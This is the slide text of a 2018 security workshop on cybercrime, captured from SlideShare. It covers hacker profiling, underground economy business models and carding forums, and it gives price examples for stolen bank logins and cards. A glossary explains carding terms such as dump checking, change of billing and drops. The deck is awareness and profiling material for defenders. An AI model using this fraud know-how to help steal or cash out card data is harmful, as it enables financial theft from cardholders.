O slideshow foi denunciado.
Seu SlideShare está sendo baixado. ×

A deep walk on the dark side of information security

Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Próximos SlideShares
Experiment
Experiment
Carregando em…3
×

Confira estes a seguir

1 de 172 Anúncio
Anúncio

Mais Conteúdo rRelacionado

Diapositivos para si (20)

Semelhante a A deep walk on the dark side of information security (20)

Anúncio

Mais de DATA SECURITY SOLUTIONS (20)

Mais recentes (20)

Anúncio

A deep walk on the dark side of information security

  1. 1. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security BrokersWorkshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers A Deep Walk on the Dark Side of Information Security Mapping Cybercrime’s new threats Raoul «Nobody» Chiesa Eng. Selene Giupponi PUBLIC RELEASE
  2. 2. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Agenda  The trainers  Kick-off  Premises, Introductions  Underground Economy: Scenarios and Actors  «Hackers»?  Profiling  The evolution of 0days market  Bitcoins  Underground currencies  Social Networks  Case study  Conclusions  Reading room  Q&A
  3. 3. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Disclaimer ● The information contained within this presentation do not infringe on any intellectual property nor does it contain tools or recipe that could be in breach with known laws. ● The statistical data presented belongs to the Hackers Profiling Project by UNICRI and ISECOM. ● Quoted trademarks belongs to registered owners. ● The views expressed are those of the author(s) and speaker(s) and do not necessary reflect the views of UNICRI or others United Nations agencies and institutes, nor the views of ENISA and its PSG (Permanent Stakeholders Group), neither Security Brokers ones. ● Contents of this presentation may not be quoted or reproduced but partially (10%), provided that the source of information is acknowledged.
  4. 4. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Introductions
  5. 5. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Raoul «Nobody» Chiesa  President, Founder, The Security Brokers  Independent Special Senior Advisor on Cybercrime @ UNICRI (United Nations Interregional Crime & Justice Research Institute)  PSG Member, ENISA (Permanent Stakeholders Group @ European Union Network & Information Security Agency)  Founder, Board of Directors and Technical Commitee Member @ CLUSIT (Italian Information Security Association)  Steering Committee, AIP/OPSI, Privacy & Security Observatory  Board of Directors, ISECOM  Board of Directors, OWASP Italian Chapter  Cultural Attachè. Scientific Committee, APWG European Chapter  Supporter at various security communities
  6. 6. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Eng. Selene Giupponi  Founder, Head of Digital Forensics Unit, Security Brokers  Computer Engineering Degree + Master in Computer Forensics & Digital Investigations  Active Member of the IT Engineer Commission, Engineers Association of the Latina Province  CLUSIT Member (ITALIAN INFORMATION SECURITY ASSOCIATION)  IISFA Member (INFORMATION SYSTEM FORENSICS ASSOCIATION, ITALIAN CHAPTER)  Technical Assessor/Expert Witness at Civil Court  Technical Assessor/Expert Witness at Criminal Court  CyberWorld Working Group former Member-@CASD ( Higher Studies Defence Center) / OSN (National Security Observatory) at the Italian Ministry of Defense
  7. 7. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Our company The Security Brokers  We deal with extremely interesting topics, giving our strong know-hows gained from +20 years of field experience and from our +30 experts, very well known all over the world in the’Information Security and Cyber Intelligence markets.  Our Key Areas of services can be resumed as:  Proactive Security  With a deep specialization on TLC & Mobile, SCADA & IA, ICN & Trasportation, Space & Air, Social Networks, e-health, *…+  Post-Incident  Attacker’s profiling, Digital Forensics (Host, Network, Mobile, GPS, etc..), Trainings  Cyber Security Strategic Consulting (Technical, Legal, Compliance, PR, Strategy)  On-demand «Ninja Teams»  Security Incident PR Handling & Management  Psychological, social and behaviour aspects (applied to cyber environments)  Cybercrime Intelligence  Botnet takeovers, takedowns, Cybercriminals bounting, Cyber Intelligence Reports, interfacciamento con CERTs e LEAs/LEOs,*…+  Information Warfare & Cyber War (only for MoDs)  0-day ed Exploits – Digital Weapons  OSINT
  8. 8. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Cybercrime
  9. 9. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers • Carder - Slang used to describe individuals who use stolen credit card account information to conduct fraudulent transactions. • Carding - Trafficking in and fraudulent use of stolen credit card account information. • Cashing - The act of obtaining money by committing fraud. This act can be committed in a variety of ways: The term can stand for cashing out Western Union wires, Postal money orders and WebMoney; using track data with PINs to obtain cash at ATMs, from PayPal accounts, or setting up a bank account with a fake ID to withdraw cash on a credit card account. • CC - Slang for credit card. • Change of Billing (COB or COBs) - Term used to describe the act of changing the billing address on a credit account to match that of a mail drop. This act allows the carder full takeover capability of the compromised credit card account and increases the probability that the account will not be rejected when being used for Internet transactions. • CVV2 - CVV2 stands for credit card security code. Visa, MasterCard, and Discover require this feature. It is a 3 digit number on the back of the card. • DDoS - Acronym for Distributed Denial of Service Attack. The intent when conducting a DDOS attack is to shut down a targeted website, at least for a period of time, by flooding the network with an overflow of traffic. • DLs - A slang term that stands for counterfeit or novelty driver's licenses. • Drop - An intermediary used to disguise the source of a transaction (addresses, phones etc.) • Dumps - Copied payment card information, at least Track 1 data, but usually Track 1 and Track 2 data. • Dump checking - Using specific software or alternatively encoding track data on plastic and using a point of sale terminal to test whether the dump is approved or declined. This provides carders a higher sense of security for obtaining quality dumps fro those who offer them and also a sense of security when doing in store carding. • Full info(s) - Term used to describe obtaining addresses, phone numbers, social security numbers, PIN numbers, credit history reports and so on. Full Info(s) are synonymous with carders who wish to take over the identity of a person or to sell the identity of a person. • Holos - Slang for the word Holograms. Holograms are important for those who make counterfeit plastic credit cards to emulate an existing security feature. • ICQ - An abbreviation for "I Seek You". ICQ is the most widely used instant messaging system for carders. Popular among Eastern Europeans in their Internet culture, it continues to be used for carding activity. • IRC - An abbreviation for "Internet Relay Chat". IRC is a global system of servers through which users can conduct real-time text-based chat, exchange files, and interact in other ways. • IDs - Slang for identification documents. Carders market a variety of IDs, including bills, diplomas, driver's licenses, passports, or anything that can be used as an identity document. • MSR (Magnetic Strip Reader) - Device that can be used for skimming payment card information and/or encoding track information on plastic. • Phishing - The extraction of information from a target using a hook (usually an e-mail purporting to be from a legitimate company). Phishers spam the Internet with e-mails in hopes of obtaining information that can be used for fraudulent purposes. • POS (Point of Sale) - Acronym for a terminal through which credit cards are swiped in order to communicate with processors who approve or decline transactions. • Proxies - Term used for proxy servers. The use of proxy servers to mask ones identity on the Internet is widely practiced amongst carders. Many vendors sell access to proxy servers, socks, http, https, and VPN (Virtual Private Networks), which aide in hiding the user's actual IP address when committing fraud or other illegal activity on the Internet. • Track 1/Track 2 data - Track 1 and Track 2 data is the information stored on the magnetic stripe of a payment card that contains the account information. Digital Underground slang (cybercrime): example
  10. 10. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers  The evolution of the so-called «hacker’s underground» led to new criminal models and approaches in the Cybercrime world.  This lesson will analyze the so-called "Underground Economy", its players and scenarios, then zooming in the Bitcoins - as well as different "cybercrime currencies.  We will bring to the audience our own experiences on these critical research areas. Premise
  11. 11. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers
  12. 12. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers  Videoclip: Will you be ready? (Did You know, 2011) Facing the «new world» with 2020
  13. 13. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Unexpected Escalation – «Insecurity by Default»  2011: the «black year» of information leak: GOVs, MILs, InfoSec, IT Industry  2012, 2013, 2014: trends are more than scary  2012: the year of «mission impossible»  2013: the year of Cryptolockers  2014: the year of Mobile & Cloud Hacking  2015, 2016, 2017, 2018: just name it….  Impressive sequences of IT incidents  No one has been able to foreseen this escalation  «Impossible» targets have been hacked  Domino effect  The borders among Cybercrime, Hacktivism, Cyber Espionage, Information Warfare and Cyber War are less and less clear  Strong need to review the criminal profiles  We must weight in the right way the psychological dynamics from attack’s modalities  We must learn to be proactive  We must learn how to manage a security incident, at once, in a professional manner.
  14. 14. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers SCADA & Industrial Automation Security, Defense in-depth Anti-DDoS, (basic) Application Security Cyber Intelligence, Black Ops Human Factor, 0days Insider’s profiling, DLPCybercrime Intelligence, Compliances
  15. 15. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Let’s stop dreaming! In order to «outperform your adversaries», you must know who they are. And, over the last 10 years, the concept of «attacker» has dramatically changed. Also, the concept of a «secure system» doesn’t exist anymore. (IMHO). Well, actually, it never existed…..?  Vulnerabilities brought-in by vendors 0days market State-Sponsored attacks DDoS powershot Cybercrime & Underground Economy That’s why this presentation will focus on something different, trying to walk you by new perspectives, providing case studies as well.
  16. 16. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers From «words»…
  17. 17. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers …to «Terminologies»  In the Information Security (InfoSec) world, we have a tremendous problem: the terminology.  Each term has different meanings, depending on the contexts and the actors.  This is not enough, tough: in the last years a new trend come out, which is adding the prefix “cyber” to most of the terms:  Cybersecurity  Cyber Drills  Cyber Exercises  Cyber Lawyer (OMG!!)  Cyber War  Cyber Terrorism  Cyber Diplomacy (cool!)  Cyber Espionage  Cyber Bullism  Cyber Stalking  Cybersex
  18. 18. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Further issues … No common spelling… „Cybersecurity, Cyber-security, Cyber Security ?” No common definitions… Cybercrime is…? No clear actors… Cyber – Crime/war/terrorism ? No common components?…  In those non English-speaking countries, problems with correctly understanding words and terms rise up..
  19. 19. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Once upon a time…. I joined the wonderful world of hacking around 1985. Back in 1996, after the operation «Ice Trap» which leaded to my (home) arrest in 1995, I jumped back to the underground «scene». My hacker friends told me they just began doing something named «Penetration Test». I had no idea WTH «that thing» was. Then I realized someone was glad to pay you in order to «hack» into something. With rules, tough. It was legal. Paid in order to do what I mostly liked?!? Risks-free?? «You must be kidding!!!!!!!», LOL 
  20. 20. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Hacker generations  First generation (70’s) was inspired by the need for knowledge  Second generation (1980-1984) was driven by curiosity plus the knowledge starving: the only way to learn OSs was to hack them; later (1985-1990) hacking becomes a trend.  The Third one (90’s) was simply pushed by the anger for hacking, meaning a mix of addiction, curiosity, learning new stuff, hacking IT systems and networks, exchanging info with the underground community. Here we saw new concepts coming, such as hacker’s e-zines (Phrack, 2600 Magazine) along with BBS  Fourth generation (2000-today) is driven by angerness and money: often we can see subjects with a very low know-how, thinking that it’s “cool & bragging” being hackers, while they are not interested in hacking & phreaking history, culture and ethics. Here hacking meets with politics (cyber-hacktivism) or with the criminal world (cybercrime).
  21. 21. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Crime -> Past “Every new technology, opens the door to new criminal approaches”. The relationship between technologies and criminality has always been – since the very beginning – characterized by a kind of “competition” between the good and the bad guys, just like cats and mice. As an example, at the beginning of 1900, when cars appeared, the “bad guys” started stealing them (!) ….the police, in order to contrast the phenomenon, defined the mandatory use of car plates… ….and the thieves began stealing the car plates from the cars (and/or “cloning” them).
  22. 22. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Crime -> Today  Those “cars” have been substituted by IT and ICT  Today’s “universal currency” is the information. You got the information, you got the power.. (at least, in politics, in the business world, in our personal relationships…) • Simply put, this happens because the “information” can be transformed at once into “something else”: 1. Competitive advantage 2. Sensible/critical information (blackmailing) 3. Money … that’s why all of us we want to “be secure”. It’s not by chance that it’s named “IS”: Information Security   Examples? (of course with cyber* as the «main actor»)  USA, China, ……  Stuxnet, Shamoon, etc..  LTT Lybia  Telecom Italia/SISMI affair  Vodafone Greece  Belgacom…………….
  23. 23. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers About Cybercrime: main mistake  We are speaking about an ecosystem which too often is underevaluated: most of times, it is the starting or the transit point towards different ecosystems:  Information Warfare  Black Ops  Industrial Espionage  Hacktivism  (private) Cyber Armies  Underground Economy and Black Markets  Organized Crime  Carders  Botnet owners  0days  Malware factories (APTs, code-writing outsourcing)  Lonely wolves  “cyber”-mercenaries, Deep Web, etc
  24. 24. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Evolution of cyber attacks
  25. 25. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Bandwidth and DDoS (2002-2009) 125 Gbit/s (US Gov, 4 Luglio 2009) 300 Gbit/s, Spamhaus / CyberBunker(2011) http://it.wikipedia.org/wiki/ CyberBunker
  26. 26. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Once upon a time Still on those years, we used to find bugs on our own: Sun Solaris (we [still] love you so much) HP/UX (harder) VAX/VMS, AXP/OpenVMS (very few ones) Linux (plenty of) etc… No one was paying us for those findings. It was just phun. No one was «selling» that stuff. We used to keep ‘em for us, and occasionally «exchange» the exploits with some other (trusted) hackers.
  27. 27. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Years later… A couple of things happened. Money slowly got involved in this research- based thing. And, the whole world got «always-on», «interconnected», IT&TLC fully-addicted. Then, Cybercrime moved to its prime-time age. Money quickly got involved in this exploits-race thing.
  28. 28. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Original «profiles» Black-hat: those who violate information systems, with or without personal advantage. They are rallied on the "bad" side, crossing over the clear demarcation line between "love for hacking" and the deliberate execution of criminal actions. For these actors, it is normal to violate an information system and to penetrate it its most secret meanders, stealing information and, given their hacker’s profile, reselling them to foreign countries. Grey-hat: those who don't want to be labeled as "black or white" and can consider themselves "ethical hackers." They often could have performed intrusions in information systems, but they have decided not to use this approach. White-hat: also defined "hunters", they have the necessary skill to be a black-hat, but they have decided to side with “the good guys”. They collaborate with the Authorities and the Police, they are in the first row in anti computer-crime operations, they are advisors for governments and companies; in their life they don't usually violate computer systems, or if they do, it is never for criminal purposes or for economic gain.
  29. 29. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers What the heck has changed then?  What’s really changed is the attacker’s typology.  From “bored teens”, doing it for “hobby and curiosity” (obviously: during night, pizza-hut’s box on the floor and cans of Red Bull)….  ...to teenagers and adults not mandatory “ICT” or “hackers”: they just do it for the money.  What’s changed is the attacker’s profile, along with its justifications, motivations and reasons.  And, Organized Crime took all of this over 
  30. 30. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers The actors? Profiling «hackers»
  31. 31. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers  Shared aspects  Seriality: both IT attacks and serial crimes are “serial”.  Virtuality: both from a psychological and a moral-ethical perspective, the actors somehow get a «mind distance» from the crimes they are executing.  Different aspects  A hacker’s modus operandi is not easy to identify • The simpleness when getting access to dedicatedsoftware resources (tools) rather than infrastructures and resources «ready to go» makes much harder to perform a complete analysis of the attack and profiling the threat agent; • The legislation does not allow a real backtracing on the attacker (Attribution)  Strategies and attack methodologies are different and they reflect heterogenous motivations of the offendersoffender.  Crime scene is not a physical place. Criminal Profiling VS Hacking
  32. 32. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers HPP v1.0 Back in 2004 we launched the Hacker’s Profiling Project - HPP: http://www.unicri.it/special_topics/cyber_threats/ Since that year: +1.200 questionnaires collected & analyzed 9 Hackers profiles emerged Two books (one in English) Profilo Hacker, Apogeo, 2007 Profiling Hackers: the Science of Criminal Profiling as Applied to the World of Hacking, Taylor&Francis Group, CRC Press (2009)
  33. 33. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Evaluation and Correlation standards Modus Operandi (MO) Lone hacker or as a member of a group Motivations Selected targets Relationship between motivations and targets Hacking career Principles of the hacker's ethics Crashed or damaged systems Perception of the illegality of their own activity Effect of laws, convictions and technical difficulties as a deterrent Mainly from: USA Italy UK Canada Lithuania Australia Malaysia Germany Brazil Romania China
  34. 34. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers HPP v1.0 - Zoom: correlation standards Gender and age group Background and place of residence How hackers view themselves Family background Socio-economic background Social relationships Leisure activities Education Professional environment Psychological traits To be or to appear: the level of self-esteem Presence of multiple personalities Psychophysical conditions Alcohol & drug abuse and dependencies Definition or self-definition: what is a real hacker? Relationship data Handle and nickname Starting age Learning and training modalities The mentor's role Technical capacities (know-how) Hacking, phreaking or carding: the reasons behind the choice Networks, technologies and operating systems Techniques used to penetrate a system Individual and group attacks The art of war: examples of attack techniques Operating inside a target system The hacker’s signature Relationships with the System Administrators Motivations The power trip Lone hackers Hacker groups Favourite targets and reasons Specializations Principles of the Hacker Ethics Acceptance or refusal of the Hacker Ethics Crashed systems Hacking/phreaking addiction Perception of the illegality of their actions Offences perpetrated with the aid of IT devices Offences perpetrated without the use of IT devices Fear of discovery, arrest and conviction The law as deterrent Effect of convictions Leaving the hacker scene Beyond hacking
  35. 35. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers OFFENDER ID LONE / GROUP HACKER TARGET MOTIVATIONS / PURPOSES Wanna Be Lamer 9-16 years “I would like to be a hacker, but I can’t” GROUP End-User For fashion, It’s “cool” => to boast and brag Script Kiddie 10-18 years The script boy GROUP: but they act alone SME / Specific security flaws To give vent of their anger / attract mass-media attention Cracker 17-30 years The destructor, burned ground LONE Business company To demonstrate their power / attract mass-media attention Ethical Hacker 15-50 years The “ethical” hacker’s world LONE / GROUP (only for fun) Vendor / Technology For curiosity (to learn) and altruistic purposes Quiet, Paranoid, Skilled Hacker 16-40 years The very specialized and paranoid attacker LONE On necessity For curiosity (to learn) => egoistic purposes Cyber-Warrior 18-50 years The soldier, hacking for money LONE “Symbol” business company / End-User For profit Industrial Spy 22-45 years Industrial espionage LONE Business company / Corporation For profit Government Agent 25-45 years CIA, Mossad, FBI, etc. LONE / GROUP Government / Suspected Terrorist/ Strategic company/ Individual Espionage/ Counter-espionage Vulnerability test Activity-monitoring Military Hacker 25-45 years LONE / GROUP Government / Strategic company Monitoring / controlling / crashing systems The 9 profiles
  36. 36. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers PROFILE MAY BE LINKED TO WILL CHANGE ITS BEHAVIOR? TARGET (NEW) MOTIVATIONS & PURPOSES Wanna Be Lamer No Script Kiddie Urban hacks No Wireless Networks, Internet Café, neighborhood, etc.. Cracker Phishing Spam Black ops Yes Companies, associations, whatever Money, Fame, Politics, Religion, etc… Ethical Hacker Massive Vulnerabilities Probably Competitors (Telecom Italia Affair), end-users Big money Quiet, Paranoid, Skilled Hacker Black ops Yes High-level targets Hesoteric request (i.e., hack “Thuraya” for us) Cyber-Warrior CNIs attacks Gov. attacks Yes “Symbols”: from Dali Lama to UN, passing through CNIs and business companies Intelligence ? Industrial Spy Yes Business company / Corporation For profit Government Agent Probably Government / Suspected Terrorist/ Strategic company/ Individual Espionage/ Counter-espionage Vulnerability test Activity-monitoring Military Hacker Probably Government / Strategic company Monitoring / controlling / crashing systems
  37. 37. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers DETERRENCE EFFECT OF: LAWS CONVICTIONS SUFFERED BY OTHER HACKERS CONVICTIONS SUFFERED BY THEM TECHNICAL DIFFICULTIES Wanna Be Lamer NULL NULL ALMOST NULL HIGH Script Kiddie NULL NULL HIGH: they stop after the 1st conviction HIGH Cracker NULL NULL NULL MEDIUM Ethical Hacker NULL NULL HIGH: they stop after the 1st conviction NULL Quiet, Paranoid, Skilled Hacker NULL NULL NULL NULL Cyber-Warrior NULL NULL NULL NULL: they do it as a job Industrial Spy NULL NULL NULL NULL: they do it as a job
  38. 38. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers HPP v2.0: what happened? VERY simple: Lack of funding: for phases 3&4 we need support! HW, SW, Analysts, Translators We started back in 2004: «romantic hackers», + we foreseen those «new» actors tough: .GOV, .MIL, Intelligence. We missed out: Hacktivism (!); Cybercriminals out of the «hobbystic» approach; OC; The financial aspects (Follow the Money!!); Cyberterrorists (do they really exist?)
  39. 39. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers HPP v2.0: next enhancements Going after Cybercriminals:  Kingpins & Master minds (the “Man at the Top”) o Organized Crime o MO, Business Model, Kingpins – “How To”  Techies hired by the Organized Crime (i.e. Romania & skimming at the very beginning; Nigerian cons 419-like; Ukraine Rogue AV; Pharma ADV Campaigns; ESTDomains in Estonia; POS malware; etc..)  Structure, Infrastructures (links with Govs & Mils?)  Money Laundering: Follow the money (E-mules & new ways to “cash-out”: mPOS, vPOS, etc..)  Outsourcing: malware factories (Stuxnet? DuQu?? Lingbo? Regint? What about all of the rest…??)
  40. 40. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers And, it’s not just «hackers»
  41. 41. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers → Why “Cybercrime”? Cybercrime “2011 Cybercrime financial turnover apparently scored up more than Drugs dealing, Human Trafficking and Weapons Trafficking turnovers” Various sources (UN, USDOJ, INTERPOL, 2011) Financial Turnover, 2011 estimation: 6-12 BLN USD$/year «Cybercrime ranks as one of the top four economic crimes» PriceWaterhouseCoopers LLC Global Economic Crime Survey 2011 2018: (at least) 80B USD$/year
  42. 42. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Cybercrime Key points  Cybercrime: “The use of IT tools and telecommunication networks in order to commit crimes in different manners”.  The axiom of the whole model: “acquiring different types of data (information), which can be transformed into money.”  Key points:  Virtual (pyramidal approach, anonymity, C&C, flexible and scalable, moving quickly and rebuilding fast, use of “cross” products and services in different scenarios and different business models)  Transnational  Multi-market (buyers)  Differentiating products and services  Low “entry-fee”  ROI /Return of Investment (on each single operation, which means that, exponentially, it can be industrialized)  Tax & (cyber) Law heaven
  43. 43. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Cybercrime’s scenario HIGHLY COMPLEX  Actors o We’ll speak about this later  Motivations o Fame o Money o Ideals o Nothing (?)  Products/Services o Campaigns on Affiliation, Traffic Generation/Boosting, Advertising, etc… o Dozens of services and products available: human creativity definetely works! o We’ll see many of them today  Legislations o Not present in all the Countries for all of the crimes o Lack of international cooperation o Cybercrime: deep presence in Countries with internal issues
  44. 44. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers «Deliverables» of Cybercrime  ID theft o Personal Infos  Credit Identity theft o Financial Info: e-banking logins, CC/CVV, «fullz», etc  Hacking o Towards e-commerce, e-banking, Credit Processing Centers  Industrial Espionage  Malware o Virus, Worm, Spyware, Key Loggers, Rogue AV, Botnets, Mobile  Hacking on-demand  DDoS attacks o Blackmail, Hacktivism  Spam  Counterfeiting o medicines, luxury, products & services  Gambling o Money laundering o Fake sites / not authorized by National authorities  Generic porn o fake sites, etc  Minors and Infants pornography
  45. 45. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Scenario odierno(cybercrime)ABN AMRO case study
  46. 46. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Getting Cybercrime’s ROI
  47. 47. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Why is all of this happening? Because users are stupid (or «naive», uneducated, not aware, etc…) Videoclip: the «wizard» from Belgium
  48. 48. Cybercrime: reasons 1. There are new users, more and more every day: this means the total amount of potential victims and/or attack vectors is increasing. 2. Making money, “somehow and straight away”. 3. Technical know-how public availability & ready-to-go, even when talking about average- high skills: that’s what I name “hacking pret-à- porter” Thanks to broadband, 3G/LTE and «always-on» WW Economical crisis… 0-days, Internet distribution system / Black Markets
  49. 49. Cybercrime: reasons /2 4. It’s extremely easy to recruit “idiots” and set up groups, molding those adepts upon the bad guy’s needs (think about e-mules) 5. “They will never bust me” 6. Lack of violent actions Newbies, Script Kids Psychology, Criminology Psychology and Sociology
  50. 50. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Cybercrime Business Model → The «RBN model» (Russian Business Network)
  51. 51. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers OC (Organized Crime) meets with Cybercrime → Command chain (and operating phases)
  52. 52. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers → Approach by «operative macro-units» OC (Organized Crime) meets with Cybercrime
  53. 53. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Cybercrime Business Model 2
  54. 54. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Examples (real ones)
  55. 55. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers In order to certify their own credibility, “vendors” often provide “demo” credit cards. This means that the buyer is able to verify the seller is “in good faith”. Here we can see that the demo provided by the seller includes every kind of data related to the owner of the credit card (“Fullz”). Examples (real ones)
  56. 56. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Esempi (reali) BOA, CITI, CHASE.COM LOGIN EMAIL+PASS FULLS COMPLETE BALANCE: $25000 verified PRICE: $525 US visa/US master $2.5 Random ITALY cc $17
  57. 57. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Diebold and Russia …while not forgetting about the malware on Diebold ATMs (2009-2012?)
  58. 58. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Examples (real ones)
  59. 59. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers $146K USD/Week Examples (real ones)
  60. 60. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Examples (real ones)
  61. 61. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Recently a cybercrooks gang has been accused of a Fake AV Fraud campaign: investigators said the revenue has been around 100 USD Millions, over one year. Examples (real ones)
  62. 62. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Examples (real ones)
  63. 63. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Examples (real ones)
  64. 64. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Admin Admin Admin Admin Global Moderator Moderator Reviewer ReviewerReviewer Reviewer Reviewed Vendor Reviewed Vendor Reviewed Vendor Reviewed Vendor Reviewed Vendor Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Member Run Escrow Service and Control Membership Supervises Content Arbitrates Disputes Monitor Individual Topic Areas Assess Quality of Vendor Products Have Permission to Sell Goods/Services To Forum Members Moderator Moderator Trial Vendor Trial Vendor Fraudsters Hackers/Coders/Data Thieves Site Management (1st Level) Examples (real ones)
  65. 65. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers  Templates used to manufacture cloned cards  Blanks produced  High quality holograms  “Dumps” data used to encode on magstripe, embosser used to print card details on front Examples (real ones)
  66. 66. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Early Arrests Markus Kellerer aka Matrix001 & Five Others, May 2007-Oct. 2007 Germany Co-Founder Renu Subramaniam aka JiLsi July 2007 United Kingdom Founder Examples (real ones)
  67. 67. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Max Butler, aka Iceman September 2007 San Francisco/Richmond Founder of CardersMarket $86 Million in actual Fraud Loss Examples (real ones)
  68. 68. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Esempi (reali)
  69. 69. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Esempi (reali)
  70. 70. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Examples (real ones)
  71. 71. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Examples (real ones): March / May 2010  March/May 2010, Turin (North-West of Italy)  Turin has got the biggest Romania’s community of Italy.  We also have a very big Nigeria’s community.  Historically, Romenian gangs drive the business of ATM skimmers…  …and Nigerian the Cocaine business.  After a joined FBI/US Secret Service/Interpol/Italian Postal Police operation, the Romanians decided to “sell” the business to Nigerians.  Cloned cards were paid with Cocaine.  This happens because the Romenians also run the prostitutes business…  …and, prostitute’s customers want coke as well.  Compared to these guys, Scarface was nearly a kid 
  72. 72. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers → Cybercrime ≠ “hackers” Differences
  73. 73. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers What came up in 2015? «Malware evolution» on POS systems»
  74. 74. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  75. 75. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  76. 76. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Point-of-Sales related Crimes
  77. 77. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  78. 78. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  79. 79. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  80. 80. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  81. 81. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  82. 82. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Cashing out
  83. 83. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  84. 84. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  85. 85. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
  86. 86. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers Malware evolution on POS
